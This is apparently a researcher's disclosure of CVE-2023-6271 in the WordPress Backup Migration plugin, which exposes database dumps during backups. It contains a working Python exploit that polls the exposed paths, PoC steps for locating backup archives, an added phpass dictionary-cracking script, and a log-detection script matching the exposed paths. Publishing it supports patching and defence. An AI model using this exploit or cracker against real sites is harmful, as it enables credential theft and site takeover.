A critical vulnerability has been identified in the Backup Migration plugin: while a backup is being created, the plugin writes its working files under the web-accessible directory wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables. This flaw not only discloses comprehensive information about the site, including its configuration, directories and files, but, more critically, grants unauthenticated access to the contents of the database, posing a significant security risk. Exploiting it leads to immediate threats, including offline cracking of the password hashes in wp_users and the subsequent compromise of the entire site.

Main info:

CVE: CVE-2023-6271
Plugin: Backup Migration < 1.3.6
Critical: Super High
All-time downloads: 1 095 243
Active installations: 90 000+
Publicly Published: December 11, 2023
Last Updated: December 11, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A3: Sensitive Data Exposure
PoC: Yes
Exploit: Yes
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6271
https://wpscan.com/vulnerability/7ac217db-f332-404b-a265-6dc86fe747b9/

Timeline

November 15, 2023: Plugin testing and vulnerability detection in the Backup Migration plugin have been completed
November 15, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
December 1, 2023: The author fixed the vulnerability and released the plugin update
December 10, 2023: Registered CVE-2023-6271

Discovery of the Vulnerability

The vulnerability was found in the directory wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables, where the plugin writes one SQL dump per database table, together with its working log, while a backup is created. Because this directory is served by the web server without any authentication, the flaw exposes extensive information about the site, including its configuration, directories and files, and, more critically, gives unauthorized access to the database contents. Exploiting it poses an immediate threat: the password hashes in wp_users can be cracked offline and the entire site subsequently compromised.

Understanding Sensitive Data Exposure attacks

Sensitive data exposure is the unintended revelation of confidential information to parties who are not authorized to see it. In WordPress this typically means exposing configuration details, directory structures, and files that were never meant to be served over HTTP, such as backups and logs. Real-world incidents show that attackers use such exposure first for reconnaissance of the site's infrastructure and then as a direct path to unauthorized access and manipulation of the data itself.

Exploiting the Sensitive Data Exposure Vulnerability

Exploiting the Backup Migration vulnerability means requesting the exposed files directly, without authentication, while a backup is in progress. The most valuable target is wp_users.sql, which contains the user_pass hash and e-mail address of every account; an attacker downloads it and runs a dictionary or brute-force attack against the hashes offline, where no rate limiting applies. A recovered administrator password gives full control of the WordPress dashboard, and the other dumps (wp_usermeta, session and login-log tables, plugin tables) supply further data for follow-up attacks on the whole system.
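The following is an added example, not code from the original post, the plugin or CleanTalk. It shows what an attacker does with a downloaded wp_users.sql: it parses the INSERT rows in the shape mysqldump writes them, picks out user_login and user_pass, and runs a small dictionary attack using a pure-Python implementation of the portable phpass scheme ($P$ prefix, 2^13 MD5 rounds, the "$P$B" hashes WordPress wrote for user_pass at the time of this advisory). The dump text, logins, salts and wordlist are constructed for the example; the hashes inside the sample dump are generated by the same phpass_hash function when the module loads and are not taken from any site. Hashes in another format (for example bcrypt, $2y$) are reported as uncracked rather than attempted.

```python
import hashlib
import re

# phpass's own base64 alphabet (not RFC 4648).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64(): 3 input bytes -> 4 alphabet chars, little-endian bit packing."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _phpass_digest(password: str, salt: str, count_log2: int) -> str:
    """The 22-char hash part: md5(salt+pw), then 2**count_log2 rounds of md5(h+pw)."""
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return _encode64(h, 16)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Build a $P$ hash; count_log2=13 yields the '$P$B' prefix WordPress writes."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the phpass alphabet")
    return "$P$" + ITOA64[count_log2] + salt + _phpass_digest(password, salt, count_log2)


def phpass_verify(password: str, stored: str) -> bool:
    """True if password matches a $P$/$H$ phpass hash; False for any other format."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    return _phpass_digest(password, stored[4:12], count_log2) == stored[12:]


# wp_users rows start with (ID, user_login, user_pass, ...); this captures the first
# three columns of each tuple and assumes logins contain no escaped quotes.
ROW_RE = re.compile(r"\((\d+),'([^']*)','([^']*)'")


def crack_dump(dump_text: str, wordlist):
    """Return {user_login: recovered_password_or_None} for every row in the dump."""
    results = {}
    for _uid, login, stored in ROW_RE.findall(dump_text):
        results[login] = next((w for w in wordlist if phpass_verify(w, stored)), None)
    return results


# Constructed sample dump in the shape of the plugin's wp_users.sql; hashes generated here.
SAMPLE_DUMP = (
    "INSERT INTO `wp_users` VALUES "
    f"(1,'admin','{phpass_hash('Winter2023!', 'k3Ys4lt1')}','admin','admin@example.com','',"
    "'2023-11-15 10:00:00','',0,'admin'),"
    f"(2,'editor','{phpass_hash('Xq9#vL2mRt!eW7', 'aB3dEfG.')}','editor','editor@example.com','',"
    "'2023-11-15 10:05:00','',0,'editor');\n"
)

# Constructed wordlist standing in for a real dictionary.
WORDLIST = ["password", "admin123", "Winter2023!", "letmein"]

if __name__ == "__main__":
    for login, pw in crack_dump(SAMPLE_DUMP, WORDLIST).items():
        print(f"{login}: {pw if pw else 'not cracked'}")
```

The point of the example is the asymmetry: the server enforces nothing once the dump has left it, so each candidate costs the attacker only 8193 MD5 computations, and a weak administrator password such as the one given to "admin" above falls to a short wordlist, while the random password given to "editor" does not.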

POC:

1) The plugin can run backups automatically, but to speed up the POC I will start one manually; this is similar to the automatic mode.

2) While the backup runs, the plugin writes its working files into a directory the web server serves without authentication. They contain a lot of sensitive data, and most importantly the backup files can be downloaded to your local machine:

./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_notes.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_support_reply.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_links.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_defender_lockout.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_acyc_test.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_wpbdp_plans.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_rm_paypal_logs.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_cfs_sessions.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_termmeta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_postmeta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_actionscheduler_actions.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_logdash_activity_meta.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_support_attachment.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_term_taxonomy.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_WPLFLA_login_failed.sql
./wordpress/wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_actionscheduler_claims.sql

and so on.

3) The exposed log file (bmi_logs_this_backup.log above) reveals the name of the plugin's backup directory. After reading wordpress/wp-content/backup-migration-(your_hash_from_log_file)/complete_logs.log, go to wordpress/wp-content/backup-migration-(your_hash_from_log_file)/backups/(hashed_name_from_log_file) and download the backup file.

EXPLOIT (python3):

import requests
import time
import threading

# The dumps exist only while a backup is being written, so every URL is polled
# until it answers 200. The target is a local test instance; adjust BASE as needed.
BASE = "http://127.0.0.1/wordpress/wp-content/plugins/backup-backup/includes/htaccess/"

urls = [
    BASE + "db_tables/wp_users.sql",
    BASE + "db_tables/wp_rm_paypal_logs.sql",
    BASE + "db_tables/wp_login_log.sql",
    BASE + "db_tables/wp_usermeta.sql",
    BASE + "db_tables/wp_rm_login_log.sql",
    BASE + "bmi_logs_this_backup.log",
    BASE + "bmi_backup_manifest.json",
]


print("The following links are checked:")
for url in urls:
    print(url)


def check_url(url):
    # Poll every 0.5 s until the file is served once, print it, then stop this thread.
    while True:
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                print(f"File at {url} found! Displaying the contents...")
                print(response.text)
                return
        except requests.RequestException as e:
            print(f"Error when requesting {url}: {e}")

        time.sleep(0.5)


# One poller per URL; daemon threads so Ctrl-C ends the script cleanly.
threads = [threading.Thread(target=check_url, args=(url,), daemon=True) for url in urls]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()

___

The potential risk associated with this vulnerability is severe. In real-world scenarios an attacker who polls the paths above (or simply waits for a scheduled backup to run) can use the exposed directory to map the site's structure, locate the backup archive and read the database dumps, including the user_pass hashes. This leads to account takeover, data manipulation and other malicious activity that compromises the integrity and security of the entire site.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability, the following recommendations are advised:
  • Plugin Update: Update Backup Migration to version 1.3.6 or later, which contains the fix; every version below 1.3.6 is vulnerable. Keep the plugin updated thereafter.
  • Directory Security Measures: Do not let the web server serve the plugin's working directories. Deny direct access to wp-content/plugins/backup-backup/includes/htaccess/ and to the backup-migration-* directories under wp-content, verify the denial by requesting one of the paths from the PoC while a backup runs, and audit such directories regularly so that new exposures are found promptly.
  • Database Encryption: Employ encryption for sensitive data stored in the database, bearing in mind that a SQL dump written to disk contains whatever the application stores in plaintext; encrypt the backup archives themselves and keep them outside the web root.
  • Password Policy: Enforce strong, unique passwords so that leaked hashes cannot be cracked quickly with a wordlist, and rotate all credentials if a dump is known to have been exposed.

By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Backup Migration vulnerability.
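As an added example (not code from the original post, the plugin or CleanTalk), the following script turns the "regular audits" recommendation into detection logic: it parses Apache/Nginx combined-format access log lines, flags requests for the paths this advisory exposes (the plugin's includes/htaccess/ working directory and the backup-migration-* directory under wp-content), and separates probes the server blocked or did not find (403/404) from files it actually served (200), which is the evidence that an exposure happened. The log lines, source addresses (RFC 5737 test ranges) and the .zip name are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format; the size and trailing fields are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Paths that should never be served: the plugin's working directory described in the
# advisory and the per-site backup-migration-<hash> directory named in step 3 of the PoC.
SENSITIVE = (
    re.compile(r"/wp-content/plugins/backup-backup/includes/htaccess/"),
    re.compile(r"/wp-content/backup-migration-[^/]+/"),
)


def normalize(path: str) -> str:
    """Drop the query string and percent-decode so %5F or ?x=1 cannot hide a hit."""
    return unquote(path.split("?", 1)[0])


def analyze(lines):
    """Return {ip: {"probes": n, "served": [paths]}} for requests to sensitive paths."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = normalize(m["path"])
        if not any(p.search(path) for p in SENSITIVE):
            continue
        entry = findings.setdefault(m["ip"], {"probes": 0, "served": []})
        entry["probes"] += 1
        if m["status"] == "200":
            entry["served"].append(path)
    return findings


# Constructed sample log; the archive name under backups/ is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2023:10:02:11 +0000] "GET /wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql HTTP/1.1" 200 48213 "-" "python-requests/2.31.0"
203.0.113.5 - - [15/Nov/2023:10:02:12 +0000] "GET /wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.5 - - [15/Nov/2023:10:03:02 +0000] "GET /wp-content/backup-migration-a1b2c3d4/backups/a1b2c3d4.zip HTTP/1.1" 200 52428800 "-" "python-requests/2.31.0"
198.51.100.7 - - [15/Nov/2023:10:03:40 +0000] "GET /wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp%5Fusers.sql?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.9 - - [15/Nov/2023:10:04:01 +0000] "GET /wp-content/uploads/2023/11/photo.jpg HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {entry['probes']} probe(s), {len(entry['served'])} file(s) served")
        for path in entry["served"]:
            print(f"    served: {path}")
```

A 403 against these paths is what a correctly configured server produces and is merely a probe to note; any 200 means the file left the server and the credentials in it must be treated as compromised. Paths are percent-decoded and stripped of their query string before matching, since a scanner can trivially obfuscate "wp_users.sql" otherwise.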

#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability


DMITRII I.

CVE-2023-6271 – Backup Migration – Unauth Sensitive Data Exposure to Full Control of the site – POC/Exploit
